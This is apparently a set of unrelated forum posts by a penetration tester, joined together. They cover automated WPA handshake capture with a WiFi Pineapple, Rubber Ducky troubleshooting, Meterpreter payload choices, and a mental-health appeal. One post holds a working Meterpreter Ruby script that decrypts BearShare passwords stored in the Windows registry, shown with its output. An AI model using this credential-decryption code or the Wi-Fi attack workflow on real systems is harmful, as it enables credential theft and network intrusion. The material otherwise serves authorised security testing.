mubix

When I do physical assessments that have WPA/2 enabled wireless networks I would like to have the ability to walk around the facility with a pineapple in my backpack and have it constantly trying to get a handshake in a reliable way. Here are a few requirement requests: Stability is key. I might only get one walk through to get it done. Needs to support more than one WPA ESSID (name). If I am targeting a building and they have a Employee and Guest networks I need to be able to get both in one go. See #1 Ability to automatically verify the handshake is valid via Aircrack or other tool Remove WPA ESSID automatically from the rotation if valid handshake is captured Shutdown the pineapple if all captured (save battery) optional setting Constantly be re-scanning the area for best AP to target. (If "BOBWIFI") is no longer in range it shouldn't attack it again Always target AP with best signal if possible Prioritize APs with clients if possible Have an auto-on with loaded AP names so I can just plug in the Pineapple when it's go time and not have to configure anything post-boot. Have the ability to auto-add APs in the area to a "temp" list while keeping a "target" list. List of APs with captured/verified handshakes for easy download of cap file Use both wifi cards if possible for 5ghz (TETRA) as well as 2ghz Try a few ways to get the handshake, I know there are a few techniques out there but I don't recall them all. Thoughts?

I'm soo late to this game but I made a video to describe my feelings about it and help where I can to spread the word: https://www.youtube.com/watch?v=Wggu_qaYJaQ part of http://hackingtogether.org/ We on this list are for the most part already participating in a social group that has support. I'm not saying we don't have problems, but the ones that don't have such support, who aren't part of any groups or you only see at a con or two, but don't speak, don't participate in CTFs or other side events. Those are the ones (usually) in the most danger of feeling isolated. So, if you know people like that, reach out, invite them to be part of your team, group, or talk. Let us all help to make sure that another life isn't list for avoidable reasons. There are too few of us as it is.

Pictures and screenshots could help with troubleshooting. Right now all we have to go on is this: You are using a 2GB SD card from an old phone formatted to FAT (I'm assuming this is a microSD You tried multiple payloads and they didn't work. Questions: Are you encoding the payloads? What payloads have you tried? Does it recognize as a keyboard when you plug it in? What operating systems have you tried plugging it into? inject.bin is in the root folder of the SD card right?

HowToGeek has a good write up on cracking WPA - http://www.howtogeek.com/202441/your-wi-fi’s-wpa2-encryption-can-be-cracked-offline-here’s-how/ You also have the Hak5 episode about cracking WPA:

reverse_tcp connections I use when I know that system can get directly to me. bind_tcp I use when I don't have another option and reverse_http / reverse_https are the ones I use the most.

Sorry don't have the phone anymore. Trying to find a phone that will work good. :/

Someone linked me to this on twitter today: http://penturalabs.wordpress.com/2013/07/29/green-for-the-anti-pineapple/

Any ideas on why the droid would show USB not connected, when I connect with the exact same cable to a PC it works just fine. This is what I get in dmesg [ 996.800000] usb 1-1.2: new high-speed USB device number 29 using ehci-platform [ 996.930000] scsi20 : usb-storage 1-1.2:1.0 [ 997.130000] usbcore: deregistering interface driver usbserial_generic [ 997.130000] USB Serial deregistering driver generic [ 997.140000] usbcore: deregistering interface driver usbserial [ 997.170000] usbcore: registered new interface driver usbserial [ 997.170000] USB Serial support registered for generic [ 997.180000] usbcore: registered new interface driver usbserial_generic [ 997.180000] usbserial: USB Serial Driver core [ 997.590000] usb 1-1.2: USB disconnect, device number 29

Mailvelope is still a good solution on Windows. My only hit on the product was that the developer wasn't using the available encryption in Chrome to encrypt his storage so that an offline attacker couldn't get the keys. And yes your point still holds that if people use a good password then the keys will be useless to the attacker.

Honestly these guys covered it really well. Technically Meterpreter itself operates only in memory. So really the only effect it has is when memory is referenced / accessed / or stored (ie. System Profiling software, Normal process execution, and Hibernate respectively). The more evident parts come in a few flavors: How the Meterpreter shellcode / payload gets executed.Is it a binary you put your payload in? a PDF?Where was it stored?Is it backed up? Is it in a location targeted by Volume Shadow Copies or Restore Points? Does the company have a shared storage of roaming profiles? How was it delivered?Was the delivery encrypted? Was it a single delivery or to many hosts/users? What C2 mechanism is used? HTTP/TCP/DNS/etc?Are the comms encrypted? Do they go trough a proxy? These are just a small number of questions, and many you can ask in a lab. Run SecurityOnion's live CD, with a pfSense firewall running Squid, put an XP VM behind them and toss your Social Engineering payload at it with your attack C2 outside of it. Use Sys Internals Process Monitor on the victim. Make sure Bro, and all the other gadets and gizmos SecurityOnion has are enabled and in-line. I guarantee you'll learn a ton just setting everything up, and a ton more once you test out your first SE.

Easiest way is to use Brup proxy to man in the middle all web traffic. Here are some tutorials how: http://carnal0wnage.attackresearch.com/2010/11/iphone-burp.html http://portswigger.net/burp/help/proxy_options_installingcacert.html#iphone You can check in side SSL with that setup. If it's not web and it's using some other protocol you may be out of luck, but good chance that it's using HTTP or HTTPS

If you still have the ability to login as that user, forced password change or not, I think you should still be able to decrypt the password. I forced a password change from one administrator account to the other and once logged in (as the user with bearshare installed) still able to decrypt the bearshare password

Ya, it was password stored in the users store. Wrote a quick script to decrypt: (mostly stolen from post/windows/gather/credentials/outlook.rb) def prepare_railgun rg = session.railgun if (!rg.get_dll('crypt32')) rg.add_dll('crypt32') end end def decrypt_password(data) rg = session.railgun pid = client.sys.process.getpid process = client.sys.process.open(pid, PROCESS_ALL_ACCESS) mem = process.memory.allocate(128) process.memory.write(mem, data) if session.sys.process.each_process.find { |i| i["pid"] == pid} ["arch"] == "x86" addr = [mem].pack("V") len = [data.length].pack("V") ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8) #print_status("#{ret.inspect}") len, addr = ret["pDataOut"].unpack("V2") else addr = [mem].pack("Q") len = [data.length].pack("Q") ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16) len, addr = ret["pDataOut"].unpack("Q2") end return "" if len == 0 decrypted_pw = process.memory.read(addr, len) return decrypted_pw end def get_valdata(k, name) @key_base = 'HKCU\\Software\\BearShare\\Users\\superuser@mailinator.com' registry_getvaldata("#{@key_base}\\#{k}", name) end prepare_railgun data = get_valdata("",'Password') print_error data.inspect password = decrypt_password(data) print_status password.inspect And got the following output when logged in as Administrator (who installed Bearshare) and with the password of 'password' meterpreter > run decrypt_bearshare [-] "\x01\x00\x00\x00\xD0\x8C\x9D\xDF\x01\x15\xD1\x11\x8Cz\x00\xC0O\xC2\x97\xEB\x01\x00\x00\x00\xEC\x01\xFB\x97\x80\xD7qF\x95\xA76b&\xC87U\ x00\x00\x00\x00 \x00\x00\x00E\x00n\x00c\x00r\x00y\x00p\x00t\x00e\x00d\x00S\x00t\x00r\x00i\x00n\x00g\x00\x00\x00\x03f\x00\x00\xA8\x00\x00\x0 0\x10\x00\x00\x00\x10\x97\xE4\xA5m\xCD\x85PI\xC67\x1Da\xB4\xBB<\x00\x00\x00\x00\x04\x80\x00\x00\xA0\x00\x00\x00\x10\x00\x00\x00\x06\xC8\x01 \x9C\xB7I\x10BL\x14{\x9D\xF5\xECp\a\x10\x00\x00\x00\xD8\xF4\vB\xE8(\xFB^\xF2\x9F\x10\xFC>cnG\x14\x00\x00\x00\xC5z\a\xD3?\xD7\xDEz0\x0E\xD8\ x9E\xC11.d\x96\x95 \xC6" [*] "password\x00" I then exported the entire registry tree for Bearshare and moved it to a new user 'bob', importing it as it was from Administrator: meterpreter > run decrypt_bearshare [-] "\x01\x00\x00\x00\xD0\x8C\x9D\xDF\x01\x15\xD1\x11\x8Cz\x00\xC0O\xC2\x97\xEB\x01\x00\x00\x00\xEC\x01\xFB\x97\x80\xD7qF\x95\xA76b&\xC87U\ x00\x00\x00\x00 \x00\x00\x00E\x00n\x00c\x00r\x00y\x00p\x00t\x00e\x00d\x00S\x00t\x00r\x00i\x00n\x00g\x00\x00\x00\x03f\x00\x00\xA8\x00\x00\x0 0\x10\x00\x00\x00\x10\x97\xE4\xA5m\xCD\x85PI\xC67\x1Da\xB4\xBB<\x00\x00\x00\x00\x04\x80\x00\x00\xA0\x00\x00\x00\x10\x00\x00\x00\x06\xC8\x01 \x9C\xB7I\x10BL\x14{\x9D\xF5\xECp\a\x10\x00\x00\x00\xD8\xF4\vB\xE8(\xFB^\xF2\x9F\x10\xFC>cnG\x14\x00\x00\x00\xC5z\a\xD3?\xD7\xDEz0\x0E\xD8\ x9E\xC11.d\x96\x95 \xC6" [*] "" No joy (as expected)